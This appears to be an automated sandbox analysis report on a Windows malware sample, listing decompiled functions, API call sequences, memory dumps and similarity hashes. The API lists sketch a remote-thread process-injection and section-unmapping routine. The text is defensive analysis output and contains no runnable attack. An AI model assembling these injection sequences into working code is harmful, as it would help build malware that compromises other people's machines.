  • Opcode Fuzzy Hash: 18E026820629C5C6567F100A28013B360CBBB7174BDDEE7600AA7391830F823017964A
  • Instruction Fuzzy Hash: 7e71ddcab038e9fbb5af92cb551e5fddf836ff781830246c217a5dd699dbe395
C-Code - Quality: 96%
			E00401033(void* _a4) {
				signed int _v8;
				long _v12;
				long _v16;
				void* _v20;
				void* _t24;
				long _t25;
				void* _t27;
				int _t32;
				long _t33;
				void* _t34;
				void* _t36;
				long _t39;

				_pop(_t41);
				_t39 = 0;
				_v8 = 0x1000;
				_t24 = CreateMailslotA("\\\\.\\mailslot\\msl0", 0x1000, 0, 0);
				_v16 = _t24;
				if(_t24 == 0) {
					_t25 = GetLastError();
					_t36 = _a4;
					_v8 = _t25;
				} else {
					_t36 = E004011F2(0x1000);
					if(_t36 == 0) {
						L10:
						_v8 = 8;
					} else {
						do {
							_t32 = ReadFile(_v20, _t36 + _t39, 0x1000,  &_v16, 0); // executed
							if(_t32 == 0) {
								_t33 = GetLastError();
								_v8 = _t33;
								if(_t33 == 0x79) {
									_v16 = 0x1000;
									goto L8;
								}
							} else {
								_v12 = _v12 + 0x1000;
								_t39 = _t39 + _v16;
								_t34 = HeapReAlloc( *0x40305c, 0, _t36, _v12); // executed
								_t36 = _t34;
								if(_t36 == 0) {
									goto L10;
								} else {
									_v8 = _v8 & 0x00000000;
									goto L8;
								}
							}
							goto L11;
							L8:
							Sleep(0x64); // executed
						} while (_v16 == 0x1000);
					}
					L11:
					CloseHandle(_v20);
				}
				if(_v8 == 0) {
					_t27 = _a4;
					 *(_t27 + 4) = _t36;
					 *((intOrPtr*)(_t27 + 8)) = _t39;
				}
				return _v8;
			}

APIs
  • CreateMailslotA.KERNEL32(\\.\mailslot\msl0,00001000,00000000,00000000), ref: 0040104F
  • GetLastError.KERNEL32 ref: 004010D6
    • Part of subcall function 004011F2: RtlAllocateHeap.NTDLL(00000000,00000000,00401543,00000208,00000000,?,004015FD,?,00000000,?,00000000,?,?,?,00000000), ref: 004011FE
  • ReadFile.KERNEL32(?,?,00001000,?,00000000), ref: 00401076
  • HeapReAlloc.KERNEL32(00000000,00000000,?), ref: 00401092
  • GetLastError.KERNEL32 ref: 004010A4
  • Sleep.KERNELBASE(00000064), ref: 004010B7
  • CloseHandle.KERNEL32(?), ref: 004010CE
Strings
Memory Dump Source
  • Source File: 00000001.00000002.556307441.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
  • Associated: 00000001.00000002.556294553.00400000.00000002.sdmp
  • Associated: 00000001.00000002.556320972.00402000.00000002.sdmp
  • Associated: 00000001.00000002.556334181.00403000.00000004.sdmp
  • Associated: 00000001.00000002.556350474.00404000.00000008.sdmp
Similarity
  • Total matches: 194
  • API ID: GetLastError$CreateFileCreateFileMappingGetFileSizeMapViewOfFile
  • String ID:
  • API String ID: 1233022807-0
  • Opcode ID: 4e81c09fe99e8d89ea399b534ce1bd7a993d4de009fd61985864dbb219ec32a9
  • Instruction ID: 8c57d43649105a239ec27ab4fc75b28ccded34715bd5cff50f2d32245f2fdfca
  • Opcode Fuzzy Hash: A4D05E6E0C193ED1C1532416D8D6B2527027F6194EA4C1C322A8925217EFF471DFCB3D
  • Instruction Fuzzy Hash: 8c57d43649105a239ec27ab4fc75b28ccded34715bd5cff50f2d32245f2fdfca
APIs
  • CreateFileW.KERNEL32(002E74BC,80000000,00000001,00000000,00000003,00000000,00000000), ref: 002E1689
  • CreateFileMappingW.KERNELBASE(00000000,00000000,00000002,00000000,00000000,00000000,?,00000000,?,002E7494), ref: 002E169F
  • MapViewOfFile.KERNEL32(00000000,00000004,00000000,00000000,00000000,?,00000000,?,002E7494), ref: 002E16B7
  • GetFileSize.KERNEL32(00000000,00000000,?,00000000,?,002E7494), ref: 002E16C9
  • GetLastError.KERNEL32(?,00000000,?,002E7494), ref: 002E16D7
  • GetLastError.KERNEL32(?,00000000,?,002E7494), ref: 002E16E4
  • GetLastError.KERNEL32(?,002E7494), ref: 002E16F3
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Similarity
  • Total matches: 307
  • API ID: ResumeThread$GetLastErrorSuspendThreadWaitForSingleObjectmemset
  • String ID:
  • API String ID: 307323562-0
  • Opcode ID: c27f9509d813d6daf3205bb55a255c7f03bb055f708febb10643d95fc60cc1d5
  • Instruction ID: f1cfcadc64cec382ba735aa2127b2eee987ae4568dc6c5c5b5c389fb459ceaed
  • Opcode Fuzzy Hash: 6C017B4E066E93C6E9662240A651FB19381BF43A74E8E9B3642B1213DA5F54B00F970D
  • Instruction Fuzzy Hash: f1cfcadc64cec382ba735aa2127b2eee987ae4568dc6c5c5b5c389fb459ceaed
APIs
  • memset.NTDLL ref: 002E22F5
    • Part of subcall function 002E32C5: GetModuleHandleA.KERNEL32(002E811F,002E618C,0000000C,?,?,002E1790,00000000,?,002E7494), ref: 002E32DF
    • Part of subcall function 002E32C5: GetProcAddress.KERNEL32(00000000,002E865C,?,?,002E1790,00000000,?,002E7494), ref: 002E32F0
    • Part of subcall function 002E32C5: OpenProcess.KERNEL32(00000400,00000000,002E7494,002E618C,0000000C,?,?,002E1790,00000000,?,002E7494), ref: 002E330D
    • Part of subcall function 002E32C5: IsWow64Process.KERNELBASE(002E74A4,?,002E618C,0000000C,?,?,002E1790,00000000,?,002E7494), ref: 002E331E
    • Part of subcall function 002E32C5: CloseHandle.KERNEL32(002E74A4), ref: 002E3331
    • Part of subcall function 002E3DE6: NtReadVirtualMemory.NTDLL(?,00000004,002E24C1,002E24C1,00000000,00000000,?,002E2351,00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084), ref: 002E3E04
    • Part of subcall function 002E3DE6: RtlNtStatusToDosError.NTDLL(C0000002), ref: 002E3E13
    • Part of subcall function 002E3DE6: SetLastError.KERNEL32(00000000,?,002E2351,00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084,00000000), ref: 002E3E1A
  • ResumeThread.KERNELBASE(?), ref: 002E2418
    • Part of subcall function 002E1A30: VirtualProtectEx.KERNELBASE(?,00000004,00000004,00000040,00000000,00000000,00000000,?,?,?,002E2370,00000000,002E24C1,CCCCFEEB,00000000,002E24C1), ref: 002E1A4D
    • Part of subcall function 002E1A30: VirtualProtectEx.KERNELBASE(?,00000004,00000004,00000000,00000000,?,00000004,002E24C1,00000004,?,?,?,?,002E2370,00000000,002E24C1), ref: 002E1A81
  • ResumeThread.KERNELBASE(?,00000000,002E24C1,CCCCFEEB,00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084,00000000), ref: 002E2380
  • WaitForSingleObject.KERNEL32(00000064), ref: 002E238E
  • SuspendThread.KERNELBASE(?), ref: 002E23A1
    • Part of subcall function 002E3DC5: RtlNtStatusToDosError.NTDLL(00000000), ref: 002E3DDD
    • Part of subcall function 002E2175: memset.NTDLL ref: 002E21A3
    • Part of subcall function 002E2175: ResumeThread.KERNEL32(?,?,00000004,00000004,?,?,?,?,?,00000004,?), ref: 002E222D
    • Part of subcall function 002E2175: WaitForSingleObject.KERNEL32(00000064), ref: 002E223B
    • Part of subcall function 002E2175: SuspendThread.KERNEL32(?), ref: 002E224E
    • Part of subcall function 002E1CB2: memcpy.NTDLL(?,CCCCFEEB,?,?,?,002E23F9,?,002E23F9,002E23F9,?,?,?,?,00000000), ref: 002E1DE0
    • Part of subcall function 002E1CB2: memcpy.NTDLL(?,CCCCFEEB,00000018,?,?,002E23F9,?,002E23F9,002E23F9,?,?,?,?,00000000), ref: 002E1E2F
    • Part of subcall function 002E1CB2: memcpy.NTDLL(?,002E24F9,00000800,?,?,?,00000000), ref: 002E1E9F
    • Part of subcall function 002E1CB2: NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 002E1ECA
    • Part of subcall function 002E1CB2: RtlNtStatusToDosError.NTDLL(00000000), ref: 002E1ED1
    • Part of subcall function 002E1CB2: CloseHandle.KERNEL32(00000000), ref: 002E1EE0
    • Part of subcall function 002E1CB2: memset.NTDLL ref: 002E1EF4
  • GetLastError.KERNEL32(00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084,00000000), ref: 002E240D
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Similarity
  • Total matches: 154
  • API ID: CloseHandleGetLastError$CreateRemoteThreadOpenProcess
  • String ID:
  • API String ID: 2418253885-0
  • Opcode ID: fc6ed82c56bfa57ab6fc962b82ba81a2bd1eb2d9df591a1fbb7d31c039fc64dc
  • Instruction ID: 2c59bf9fd095a6a154c166d1de637fec8a0963239cb22c2ae0ed4b07e56e9f65
  • Opcode Fuzzy Hash: 1CE055000D66E7C19832E052E490BB2A246FE0120EA8C2B30022C24723AF0935572A8C
  • Instruction Fuzzy Hash: 2c59bf9fd095a6a154c166d1de637fec8a0963239cb22c2ae0ed4b07e56e9f65
APIs
    • Part of subcall function 002E32C5: GetModuleHandleA.KERNEL32(002E811F,002E618C,0000000C,?,?,002E1790,00000000,?,002E7494), ref: 002E32DF
    • Part of subcall function 002E32C5: GetProcAddress.KERNEL32(00000000,002E865C,?,?,002E1790,00000000,?,002E7494), ref: 002E32F0
    • Part of subcall function 002E32C5: OpenProcess.KERNEL32(00000400,00000000,002E7494,002E618C,0000000C,?,?,002E1790,00000000,?,002E7494), ref: 002E330D
    • Part of subcall function 002E32C5: IsWow64Process.KERNELBASE(002E74A4,?,002E618C,0000000C,?,?,002E1790,00000000,?,002E7494), ref: 002E331E
    • Part of subcall function 002E32C5: CloseHandle.KERNEL32(002E74A4), ref: 002E3331
  • OpenProcess.KERNEL32(001F0FFF,00000000,002E15DA,002E15DA,C000009A,002E7494,00000000,?,?,002E15DA,?,00000000,?,002E7494), ref: 002E2452
  • CreateRemoteThread.KERNEL32(?,00000000,00000000,00000000,00000000,00000004,00000000,?,?,002E15DA,?,00000000,?,002E7494), ref: 002E24AC
  • GetLastError.KERNEL32(?,?,002E15DA,?,00000000,?,002E7494), ref: 002E24CE
    • Part of subcall function 002E22D2: memset.NTDLL ref: 002E22F5
    • Part of subcall function 002E22D2: ResumeThread.KERNELBASE(?,00000000,002E24C1,CCCCFEEB,00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084,00000000), ref: 002E2380
    • Part of subcall function 002E22D2: WaitForSingleObject.KERNEL32(00000064), ref: 002E238E
    • Part of subcall function 002E22D2: SuspendThread.KERNELBASE(?), ref: 002E23A1
    • Part of subcall function 002E22D2: GetLastError.KERNEL32(00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084,00000000), ref: 002E240D
    • Part of subcall function 002E22D2: ResumeThread.KERNELBASE(?), ref: 002E2418
  • CloseHandle.KERNEL32(002E15DA), ref: 002E24C6
  • CloseHandle.KERNEL32(?), ref: 002E24E0
  • GetLastError.KERNEL32(?,?,002E15DA,?,00000000,?,002E7494), ref: 002E24E8
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Similarity
  • Total matches: 223
  • API ID: CloseHandleGetModuleHandleGetProcAddressIsWow64ProcessOpenProcess
  • String ID:
  • API String ID: 2525968537-0
  • Opcode ID: 4e39e43a056f2dbc5d7c37fe404edc70e416bd2b8df7daf7df2d9869e76f3aeb
  • Instruction ID: 2669984e2993e946f45bcfa7194f2494cfbb83a06d855a5a0d403690f303e393
  • Opcode Fuzzy Hash: A5D05E444F5C37C94021B9D2E46EB7122D13EA02DD4CC31A11258609175F3132EB4A7D
  • Instruction Fuzzy Hash: 2669984e2993e946f45bcfa7194f2494cfbb83a06d855a5a0d403690f303e393
APIs
  • GetModuleHandleA.KERNEL32(002E811F,002E618C,0000000C,?,?,002E1790,00000000,?,002E7494), ref: 002E32DF
  • GetProcAddress.KERNEL32(00000000,002E865C,?,?,002E1790,00000000,?,002E7494), ref: 002E32F0
  • OpenProcess.KERNEL32(00000400,00000000,002E7494,002E618C,0000000C,?,?,002E1790,00000000,?,002E7494), ref: 002E330D
  • IsWow64Process.KERNELBASE(002E74A4,?,002E618C,0000000C,?,?,002E1790,00000000,?,002E7494), ref: 002E331E
  • CloseHandle.KERNEL32(002E74A4), ref: 002E3331
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Similarity
  • Total matches: 294
  • API ID: RegCloseKeyRegEnumKeyExRegOpenKeyExWaitForSingleObject
  • String ID:
  • API String ID: 748258982-0
  • Opcode ID: 34aa78697289c7e337ace2860545490defdbd3f605ccc2af44dba403dee5d043
  • Instruction ID: b2117792a550c765d34f83fffc2248c31990b78765c7e4c07fd96cf57681afa6
  • Opcode Fuzzy Hash: D1F0C0450B6CC357C42B90426F92772D241EF218C8C8C67556BB87D2FA0D207193512B
  • Instruction Fuzzy Hash: b2117792a550c765d34f83fffc2248c31990b78765c7e4c07fd96cf57681afa6
APIs
  • RegOpenKeyExA.KERNEL32(80000003,00000000,00000000,?,?,00000000,000000B7,?,?,00000000,?,?,002E7494), ref: 002E4244
    • Part of subcall function 002E115C: RtlAllocateHeap.NTDLL(00000000,?,002E3CA0), ref: 002E1168
  • RegEnumKeyExA.KERNEL32(?,?,?,002E7494,00000000,00000000,00000000,00000000,00000104,00000000,?,?,00000000,?,?,002E7494), ref: 002E428B
  • WaitForSingleObject.KERNEL32(00000000,?), ref: 002E42F8
    • Part of subcall function 002E1171: HeapFree.KERNEL32(00000000,?,002E3D05), ref: 002E117D
    • Part of subcall function 002E2E04: StrChrA.SHLWAPI(002E7494,0000005F), ref: 002E2E47
    • Part of subcall function 002E2E04: lstrcpy.KERNEL32(?,002E7494), ref: 002E2E5F
    • Part of subcall function 002E2E04: RegOpenKeyA.ADVAPI32(?,?,00000000), ref: 002E2E95
    • Part of subcall function 002E2E04: RegQueryValueExW.KERNEL32(00000000,002E81C0,00000000,?,00000000,002E7494), ref: 002E2EBB
    • Part of subcall function 002E2E04: lstrlenW.KERNEL32 ref: 002E2ECC
    • Part of subcall function 002E2E04: RtlAllocateHeap.NTDLL(00000000,002E74CA), ref: 002E2EE1
    • Part of subcall function 002E2E04: RegQueryValueExW.KERNEL32(00000000,002E81C0,00000000,?,00000000,002E7494), ref: 002E2F06
    • Part of subcall function 002E2E04: CreateDirectoryW.KERNELBASE(00000000,00000000), ref: 002E2F2A
    • Part of subcall function 002E2E04: CreateDirectoryW.KERNELBASE(00000000,00000000), ref: 002E2F3C
    • Part of subcall function 002E2E04: lstrcmpiW.KERNEL32(00000000), ref: 002E2F53
    • Part of subcall function 002E2E04: lstrcpy.KERNEL32(?,002E80FA), ref: 002E2F95
    • Part of subcall function 002E2E04: lstrcpy.KERNEL32(?,?), ref: 002E2FEE
    • Part of subcall function 002E2E04: RegCreateKeyA.ADVAPI32(?,?,?), ref: 002E3002
    • Part of subcall function 002E2E04: RegQueryValueExA.KERNEL32(?,002E8256,00000000,?,?,002E7494), ref: 002E3025
    • Part of subcall function 002E2E04: RegOpenKeyExA.ADVAPI32(?,?,00000000,B.,?,?,?,?), ref: 002E3088
    • Part of subcall function 002E2E04: RegOpenKeyW.ADVAPI32(?,00000000,?), ref: 002E30A3
    • Part of subcall function 002E2E04: RegDeleteValueW.ADVAPI32(?,002E7560), ref: 002E30B1
    • Part of subcall function 002E2E04: RegCloseKey.ADVAPI32(?), ref: 002E30BA
    • Part of subcall function 002E2E04: RegCloseKey.ADVAPI32(?), ref: 002E30C3
    • Part of subcall function 002E2E04: HeapFree.KERNEL32(00000000,002E7494,?), ref: 002E30D8
    • Part of subcall function 002E2E04: HeapFree.KERNEL32(00000000,00000000), ref: 002E30FB
    • Part of subcall function 002E2E04: RegCloseKey.ADVAPI32(00000000), ref: 002E310D
  • RegCloseKey.ADVAPI32(?,00000104,00000000,?,?,00000000,?,?,002E7494), ref: 002E4320
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Similarity
  • Total matches: 385
  • API ID: CloseHandleCreateFileReadFileSetFilePointer
  • String ID:
  • API String ID: 3466452087-0
  • Opcode ID: 02226af8252c5962bd8a1246e83dd3874d4324e234fa97607c7506bcccf428ae
  • Instruction ID: 0b1efe8f82c14c9c115ac041850c3d7abbae31b8c88273cc80ee50ce97004722
  • Opcode Fuzzy Hash: 73E026442E9D83CDC6535584D842B36B370E3A060AD9CA7724708AF2329F2A3127DF3E
  • Instruction Fuzzy Hash: 0b1efe8f82c14c9c115ac041850c3d7abbae31b8c88273cc80ee50ce97004722
APIs
    • Part of subcall function 002E3C8B: GetModuleFileNameW.KERNEL32(002E7494,00000000,00000104,00000208,002E618C,0000000C,?,?,002E2A88,?,00000001,002E618C,0000000C,00000000), ref: 002E3CB1
    • Part of subcall function 002E3C8B: GetModuleFileNameA.KERNELBASE(002E7494,00000000,00000104,00000208,002E618C,0000000C,?,?,002E2A88,?,00000001,002E618C,0000000C,00000000), ref: 002E3CB9
    • Part of subcall function 002E3C8B: GetLastError.KERNEL32(?,?,002E2A88,?,00000001,002E618C,0000000C,00000000,?,?,?,002E17BE), ref: 002E3CF7
    • Part of subcall function 002E48FB: lstrcmp.KERNEL32(?,002E7494), ref: 002E49A8
    • Part of subcall function 002E48FB: lstrlen.KERNEL32(?,00000000,00000000,002E1852), ref: 002E49B3
  • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 002E33BB
  • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,?,002E1BAF,002E8451), ref: 002E33CD
  • ReadFile.KERNEL32(?,?,00000004,?,00000000), ref: 002E33E5
  • CloseHandle.KERNEL32(?), ref: 002E3400
    • Part of subcall function 002E1171: HeapFree.KERNEL32(00000000,?,002E3D05), ref: 002E117D
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Similarity
  • Total matches: 141
  • API ID: ExitThreadGetLastErrorGetModuleHandleHeapCreate
  • String ID:
  • API String ID: 1629895477-0
  • Opcode ID: 3346d6f2501fa6e0feb3b6aa12f6673d7b3f00fa5b3f967e9b051ebee9392a59
  • Instruction ID: e8713d3dc0698a6a8bb7c905658f1a1c6b84964cde7fdefe521c6c0259fcc8dc
  • Opcode Fuzzy Hash: 3EB09250504A0380E05CBAE1780035312873B92346D2C852003C330A07C34130A80E44
  • Instruction Fuzzy Hash: e8713d3dc0698a6a8bb7c905658f1a1c6b84964cde7fdefe521c6c0259fcc8dc
C-Code - Quality: 100%
			_entry_() {
				void* _t2;
				long _t3;
				long _t4;

				_t4 = GetModuleHandleA(0); // executed
				_t2 = HeapCreate(0, 0x10000, 0); // executed
				if(_t2 == 0) {
					_t3 = GetLastError();
				} else {
					_t3 = E00401639(_t2, _t4); // executed
				}
				ExitThread(_t3);
			}

APIs
  • GetModuleHandleA.KERNEL32(00000000), ref: 00401003
  • HeapCreate.KERNELBASE(00000000,00010000,00000000), ref: 00401014
  • GetLastError.KERNEL32 ref: 00401026
  • ExitThread.KERNEL32 ref: 0040102D
    • Part of subcall function 00401639: CreateThread.KERNEL32(00000000,00000000,00401034,?,00000000,?), ref: 0040166E
    • Part of subcall function 00401639: CreateThread.KERNEL32(00000000,00000000,004010FB,?,00000000,?), ref: 0040168C
    • Part of subcall function 00401639: WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 004016A3
    • Part of subcall function 00401639: GetExitCodeThread.KERNEL32(00000000,?,?,?,00000000), ref: 004016B0
    • Part of subcall function 00401639: WaitForSingleObject.KERNEL32(?,000000FF), ref: 004016C0
    • Part of subcall function 00401639: GetExitCodeThread.KERNEL32(?,?,?,?,00000000), ref: 004016C9
    • Part of subcall function 00401639: TerminateThread.KERNEL32(?,?,?,?,00000000), ref: 004016E7
    • Part of subcall function 00401639: CloseHandle.KERNEL32(?), ref: 004016F0
    • Part of subcall function 00401639: GetLastError.KERNEL32(?,?,00000000), ref: 004016F8
    • Part of subcall function 00401639: CloseHandle.KERNEL32(?), ref: 00401704
    • Part of subcall function 00401639: GetLastError.KERNEL32(?,00000000), ref: 0040170D
Memory Dump Source
  • Source File: 00000001.00000002.556307441.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
  • Associated: 00000001.00000002.556294553.00400000.00000002.sdmp
  • Associated: 00000001.00000002.556320972.00402000.00000002.sdmp
  • Associated: 00000001.00000002.556334181.00403000.00000004.sdmp
  • Associated: 00000001.00000002.556350474.00404000.00000008.sdmp
Similarity
  • Total matches: 157
  • API ID: HeapFree
  • String ID: Local\
  • API String ID: 2968971433-422136742
  • Opcode ID: 61488c984085a4f122944a9e8d254705a555d96723ee699a890829b662474710
  • Instruction ID: 1190ac8c8153efc7fbe18480ed835a142fa9a419ba70fc421a6de9198c64d95a
  • Opcode Fuzzy Hash: DFE02C01219EB1CFC4272014EE2813781B8FB1082A8CDB37443C00A2F2EE2825336E0B
  • Instruction Fuzzy Hash: 1190ac8c8153efc7fbe18480ed835a142fa9a419ba70fc421a6de9198c64d95a
APIs
    • Part of subcall function 002E45C1: HeapFree.KERNEL32(00000000,00000000,00000000), ref: 002E4610
    • Part of subcall function 002E475C: lstrlen.KERNEL32(002E618C,00000000,?,00000027,002E618C,00000000,00000000,002E822E,00000000,?,002E618C,00000000,00000000), ref: 002E4792
    • Part of subcall function 002E475C: lstrcpy.KERNEL32(00000000,00000000), ref: 002E47B6
    • Part of subcall function 002E475C: lstrcat.KERNEL32(00000000,00000000), ref: 002E47BE
  • HeapFree.KERNEL32(00000000,?,Local\), ref: 002E1217
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false

Similar Non-Executed Functions

Similarity
  • Total matches: 218
  • API ID: GetCurrentThreadIdGetSystemTimeAsFileTimeGetTempFileNamePathFindExtensionlstrcpy
  • String ID:
  • API String ID: 1809591024-0
  • Opcode ID: e1752541d73a16271eeb0a7262a47e2e067e5139649c82f5e8bd71f01fb1fcfd
  • Instruction ID: 7ef3357a5521eb77bbf90f27709a0b2fe94b571aa2e597432c6d8f6d1a89cec9
  • Opcode Fuzzy Hash: 28D02E858E0880DB9D3B8808E04072682C22C2830218C78164A0A317226F20318FFF2D
  • Instruction Fuzzy Hash: 7ef3357a5521eb77bbf90f27709a0b2fe94b571aa2e597432c6d8f6d1a89cec9
APIs
    • Part of subcall function 002E115C: RtlAllocateHeap.NTDLL(00000000,?,002E3CA0), ref: 002E1168
  • GetCurrentThreadId.KERNEL32(?,?,?,002E4C06,?,002E74BC,00000000,002E2D09,00000750), ref: 002E4BAB
  • GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,002E4C06,?,002E74BC,00000000,002E2D09,00000750), ref: 002E4BB7
  • GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000), ref: 002E4BC5
  • PathFindExtensionA.SHLWAPI(00000000), ref: 002E4BD9
  • lstrcpy.KERNEL32(00000000), ref: 002E4BE0
    • Part of subcall function 002E1171: HeapFree.KERNEL32(00000000,?,002E3D05), ref: 002E117D
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Similarity
  • Total matches: 305
  • API ID: CreateEventGetCurrentProcessIdGetVersionOpenProcess
  • String ID:
  • API String ID: 4193297829-0
  • Opcode ID: d8dea5f47279ff853c8e6c0729a614c8beac44f71225f0b0d2aaa62a2a57016e
  • Instruction ID: 55344035e386b307fdbdb0087fb3924a77938adfeec028a63dbf343d589967b5
  • Opcode Fuzzy Hash: DAD0A7451C88F0D668246492EC8C7740B427C773CEC1D1000009864A01CBD9FFB37D5C
  • Instruction Fuzzy Hash: 55344035e386b307fdbdb0087fb3924a77938adfeec028a63dbf343d589967b5
APIs
  • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,002E7494,002E1728,?,002E7494), ref: 002E2A0A
  • GetVersion.KERNEL32(?,002E7494), ref: 002E2A19
  • GetCurrentProcessId.KERNEL32(?,002E7494), ref: 002E2A30
  • OpenProcess.KERNEL32(0010047A,00000000,00000000,?,002E7494), ref: 002E2A49
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Similarity
  • Total matches: 183
  • API ID: lstrcpy$CoInitializeExCoUninitializePathFindExtensionShellExecuteExlstrlenmemsetwsprintf
  • String ID: <
  • API String ID: 1457465641-4251816714
  • Opcode ID: 3f2b9fcc2af1264bbed65c952509bd9e2800f2d6ba6530589bf9dcfa6290030a
  • Instruction ID: 90736e0f68e5538e275b6e56e125247b4719fc3da7e88937ca4107ae998a2e85
  • Opcode Fuzzy Hash: 03F0AC60AB2683C5CCF35840E54579D87C06B21A79C8C4B315508F45A77F28325F4F6C
  • Instruction Fuzzy Hash: 90736e0f68e5538e275b6e56e125247b4719fc3da7e88937ca4107ae998a2e85
APIs
  • memset.NTDLL ref: 002E2CEE
  • CoInitializeEx.OLE32(00000000,00000002), ref: 002E2CF9
  • PathFindExtensionW.SHLWAPI(00000000), ref: 002E2D14
  • lstrcpyW.KERNEL32(00000000,002E8224), ref: 002E2D29
  • lstrlen.KERNEL32(002E7494,?,?,?,?,?,?,?,?,?,?,002E18D7,?), ref: 002E2D46
  • lstrcpyW.KERNEL32(00000000,002E84B8), ref: 002E2D77
    • Part of subcall function 002E115C: RtlAllocateHeap.NTDLL(00000000,?,002E3CA0), ref: 002E1168
  • wsprintfW.USER32 ref: 002E2DAE
  • ShellExecuteExW.SHELL32(0000003C), ref: 002E2DE3
  • CoUninitialize.OLE32 ref: 002E2DF7
    • Part of subcall function 002E1171: HeapFree.KERNEL32(00000000,?,002E3D05), ref: 002E117D
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Similarity
  • Total matches: 320
  • API ID: GetLastError$CloseHandleCreateFileSetEndOfFileWriteFile
  • String ID:
  • API String ID: 3756146440-0
  • Opcode ID: 13a3fbb8c54243ae1405e1c57313f2c46c53332a02a93cc9283264dcae27056a
  • Instruction ID: 25e21f08b45b65ae728795522a9e901a714bf6768e996c71cc9bf29c7ae853b0
  • Opcode Fuzzy Hash: 49D0224D1F030BD4C82394A2E0C2F10C6823F32100D3C022402082836B8F3631EFDE6D
  • Instruction Fuzzy Hash: 25e21f08b45b65ae728795522a9e901a714bf6768e996c71cc9bf29c7ae853b0
APIs
  • CreateFileW.KERNEL32(002E7494,C0000000,00000000,00000000,00000004,00000080,00000000), ref: 002E4B26
  • GetLastError.KERNEL32(?,002E2C59,00000000,002E7494,?,00001FD1,00000000,00000000,?,?,002E18C5,?,?), ref: 002E4B33
  • WriteFile.KERNEL32(00000000,?,00001000,002E7494,00000000), ref: 002E4B49
  • SetEndOfFile.KERNEL32(00000000,?,002E2C59,00000000,002E7494,?,00001FD1,00000000,00000000,?,?,002E18C5,?,?), ref: 002E4B54
  • GetLastError.KERNEL32(?,002E2C59,00000000,002E7494,?,00001FD1,00000000,00000000,?,?,002E18C5,?,?), ref: 002E4B5C
  • CloseHandle.KERNEL32(00000000), ref: 002E4B65
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Similarity
  • Total matches: 377
  • API ID: CloseHandleCreateFileGetFileSizeGetLastErrorReadFile
  • String ID:
  • API String ID: 1827773359-0
  • Opcode ID: 9f3baee91e90600c7ef65055cc937090c80b1848b2f2516f31576c2ec84c2916
  • Instruction ID: 5daf692a53dad62940b146f0af9ee31aa5a4f052f94ea12f534120e924777b7f
  • Opcode Fuzzy Hash: 80E02608AE0A47CCD46B9C42D482F00A7826F61609DAD39655208293734F2132AFEB3C
  • Instruction Fuzzy Hash: 5daf692a53dad62940b146f0af9ee31aa5a4f052f94ea12f534120e924777b7f
APIs
  • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 002E4A7E
  • GetFileSize.KERNEL32(00000000,00000000,?,?,002E2AF0,002E74BC,?,?,?,B.,002E2FAC,?,?), ref: 002E4A8E
    • Part of subcall function 002E115C: RtlAllocateHeap.NTDLL(00000000,?,002E3CA0), ref: 002E1168
  • ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 002E4ABA
  • GetLastError.KERNEL32(?,?,002E2AF0,002E74BC,?,?,?,B.,002E2FAC,?,?), ref: 002E4ADF
  • CloseHandle.KERNEL32(000000FF), ref: 002E4AF0
    • Part of subcall function 002E1171: HeapFree.KERNEL32(00000000,?,002E3D05), ref: 002E117D
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Similarity
  • Total matches: 388
  • API ID: ResumeThreadSuspendThreadWaitForSingleObjectmemset
  • String ID:
  • API String ID: 4069891769-0
  • Opcode ID: 97ca6bb9ca5fe7b510779c132f311c73afcc437a32033944fe2e30fe2d70fbee
  • Instruction ID: 389f8e6b2b9a9dadd75e162c423f4892cc8029b080c4ee30251df583d1f82c9e
  • Opcode Fuzzy Hash: B5019C47292A71C6D501A8068699739F1C3FB42EBAE2CF700D6C1B01DA0ED479F2DB6C
  • Instruction Fuzzy Hash: 389f8e6b2b9a9dadd75e162c423f4892cc8029b080c4ee30251df583d1f82c9e
APIs
  • memset.NTDLL ref: 002E21A3
    • Part of subcall function 002E1FFA: memset.NTDLL ref: 002E2036
  • ResumeThread.KERNEL32(?,?,00000004,00000004,?,?,?,?,?,00000004,?), ref: 002E222D
  • WaitForSingleObject.KERNEL32(00000064), ref: 002E223B
  • SuspendThread.KERNEL32(?), ref: 002E224E
